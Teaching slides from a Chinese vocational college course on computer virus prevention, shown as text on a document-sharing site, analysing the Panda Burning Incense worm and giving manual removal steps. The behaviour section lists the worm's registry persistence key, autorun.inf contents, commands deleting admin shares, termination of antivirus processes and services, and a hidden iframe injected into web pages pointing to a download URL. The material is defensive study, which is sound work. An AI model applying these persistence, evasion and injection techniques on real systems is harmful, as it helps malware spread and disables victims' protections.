- 1、本文档共39页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
计算机病毒与防治 教学单元4-4 蠕虫病毒防治 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒手工清除 熊猫烧香病毒手工清除 本讲小结 计算机病毒与防治课程小组 (3)创建启动项: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] svcshare=%System%\drivers\spoclsv.exe 熊猫烧香在注册表中添加启动项 计算机病毒与防治课程小组 (4)在各分区根目录生成病毒副本: X:\setup.exe X:\autorun.inf 其中autorun.inf中的内容是: [AutoRun] OPEN=setup.exe shellexecute=setup.exe shell\Auto\command=setup.exe 计算机病毒与防治课程小组 (5)使用net share命令关闭管理共享: cmd.exe /c net share X$ /del /y cmd.exe /c net share admin$ /del /y (6)修改“显示所有文件和文件夹”设置: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] CheckedValue=dword(7)尝试关闭安全软件相关窗口: 天网防火墙进程、VirusScan 、NOD32等 (8)尝试结束安全软件相关进程: Mcshield.exe VsTskMgr.exe等 计算机病毒与防治课程小组 (9)禁用安全软件相关服务: Schedule sharedaccess RsCCenter 等 (10)删除安全软件相关启动项: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP (11)遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息: iframe src=hxxp:///wuhan/down.htm width=0 height=0 frameborder=0 /iframe (12)在访问过的目录下生成Desktop_.ini文件,内容为当前日期。 (13)此外,病毒还会尝试删除GHO文件。 计算机病毒与防治课程小组 病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中。 弱密码文件 计算机病毒与防治课程小组 (1)结束病毒进程: %System%\drivers\spoclsv.exe 查看当前运行spoclsv.exe的路径 (2)删除病毒文件: %System%\drivers\spoclsv.exe 不同的spoclsv.exe变种,此目录可不同。有的病毒变种可能在以下目录中:C:\WINDOWS\System32\Drivers\spoclsv.exe。 (3)删除病毒启动项: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] svcshare=%System%\drivers\spoclsv.exe * Virus 重庆电子工程职业学院 计算机病毒与防治课程小组 熊猫烧香病毒源码分析 熊猫烧香病毒特点 熊猫烧香病毒行为分析 第二讲 熊猫烧香蠕虫病毒剖析 计算机病毒与防治课程小组 熊猫
您可能关注的文档
最近下载
- 太空葛根的营养功能成分和淀粉理化特性评价.docx VIP
- 【2005-2023年】662有机化学历年真题(高清版).pdf VIP
- 小学科学教学融入STEM理念的设计与实践案例:2下-磁铁迷宫.docx VIP
- 2024北京东城区初二(下)期末英语及答案.docx VIP
- 2025年度卫生招聘考试(眼科学)新版真题卷(附详细解析).pdf VIP
- 2025北京东城区初二期末(下)语文试卷及答案.docx VIP
- 2024年-xx地铁钢轨探伤培训PPT.pdf VIP
- 山西省监狱局刑罚执行试题及答案.pdf VIP
- 2024年北京市中考英语试题卷(含答案逐题解析).docx
- 手术室儿童科普.pptx VIP
文档评论(0)